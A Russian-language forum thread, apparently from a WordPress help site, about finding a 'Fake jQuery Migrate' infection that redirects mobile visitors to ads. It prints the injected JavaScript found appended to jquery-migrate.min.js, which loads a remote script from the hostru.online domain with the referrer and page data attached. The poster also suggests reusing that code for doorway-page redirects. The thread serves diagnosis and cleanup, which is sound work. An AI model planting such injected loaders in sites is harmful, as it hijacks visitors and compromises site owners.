Отловить spam вирус — Fake Jquery migrate

В шапку сайта добавляется url

<script src="https://hostru.online/nHpGrk?se_referrer=&default_keyword=site%20-%20%D0%A1%D0%BE%D0%B1%D0%B8%D1%80%D0%B0%D0%B9%20%D1%81%D0%BE%20%D0%9C%D0%BD%D0%BE%D0%B9!&&frm=script&_cid=17700e5c-9ece-508b-44a9-115b79d0ff75"></script>

Тема вроде бы чиста, как узнать какой скрипт дописывает ? какими средствами уловить ?

и самое интересное что эта зараза выскакивает только с мобильной версии.

РЕШЕНИЕ:
Пока что залез в инструменты браузера
1 посмотреть код
2 вкладка NETWORK
3 выставил мобильную версию
4 отключил кеш в настройках NETWORK
5 обновил страницу
6 в логах через фильтр нашел код
7 в инфе сбоку уже появилась информация откуда берется вредный код.

дописалась в конце зараза:

\wp-includes\js\jquery\jquery-migrate.min.js

if (/Android|webOS|iPhone|iPad|iPod|BlackBerry|BB|PlayBook|IEMobile|Windows Phone|Kindle|Silk|Opera Mini/i.test(navigator.userAgent)) {
	var d = document;
	var s = d.createElement('script');
	s.src = 'https://hostru.online/nHpGrk?se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&' + window.location.search.replace('?', '&') + '&frm=script&_cid=17700e5c-9ece-508b-44a9-115b79d0ff75';
	d.getElementsByTagName('head')[0].appendChild(s);
}

Домены и индикаторы оставил, может у кото-то тоже болячка вскочит.

так же полезная штука для тех кто хочет перенаправление сделать на js для подходящих браузеров и создать статистику переходов, мне иногда такой код нужен был, чтоб соцсети отлавливать и дорвеи.

Заметки к вопросу:
Kama месяц назад

PHP добавляет или в шаблон суется, или это JS?

kolshix месяц назад

Каким то боком был дописан код в конец js файла.
Больше ничего не менялось.
Этот код если добавить в js файл любой, будет создавать небольшую часть кода при подгрузке страницы и пихать код в шапку, тема сайта никак не затрагивается. А дальше будет редирект на рекламу 1-2 раза в сутки.

kolshix месяц назад

Самое обидное что я не посмотрел когда файл правили.

mi13 месяц назад

В нете куча статей по запросу "Fake Jquery migrate".

kolshix месяц назад

Это те кто знает, а когда далек, все сложно. Разновидностей я так понял много. Мне легкая попалась, просто с дописанным кодом что показал выше.
Если бы программист был по умнее и не затрагивал главную страницу, я бы наверно с пол года не замечал инъекцию и редирект на ADS сайт

mi13 месяц назад

Да, интересно как они туда прописывают, htaccess помогает или нет? А так в качестве быстрого решения можно отрубить migrate, так как он в большинстве случаев не нужен..

add_filter( 'wp_default_scripts', 'remove_jquery_migrate' );
function remove_jquery_migrate( $scripts ) {
	if ( empty( $scripts->registered['jquery'] ) || is_admin() ) {
		return;
	}
	$deps = & $scripts->registered['jquery']->deps;
	$deps = array_diff( $deps, [ 'jquery-migrate' ] );
}